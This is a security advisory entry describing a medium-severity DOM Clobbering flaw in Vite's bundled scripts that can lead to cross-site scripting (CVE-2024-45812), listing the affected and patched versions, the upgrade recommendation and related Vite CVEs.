Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS
- Severity:
- Medium
Description
We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
Recommendation
Update the vite package to the latest compatible version. Followings are version details:
Affected version(s): **>= 5.0.0, < 5.1.8 < 3.2.11 >= 5.2.0, < 5.2.14 >= 5.3.0, < 5.3.6 >= 5.4.0, < 5.4.6 >= 4.0.0, < 4.5.4** Patched version(s): **5.1.8 3.2.11 5.2.14 5.3.6 5.4.6 4.5.4**
References
- GHSA-64vr-g452-qvp3
- research.securitum.com
- scnps.co
- CVE-2024-45812
- CWE-79
- CAPEC-310
- OWASP 2021-A3
- OWASP 2021-A6
Related Issues
- Vite middleware may serve files starting with the same name with the public directory - CVE-2025-58751
- Vite's server.fs.deny bypassed with /. for files under project root - CVE-2025-46565
- Vite allows server.fs.deny to be bypassed with .svg or relative paths - CVE-2025-31486
- @sveltejs/kit vulnerable to Cross-site Scripting via tracked search_params - CVE-2025-32388
- Tags:
- npm
- vite
Anything's wrong? Let us know Last updated on September 19, 2024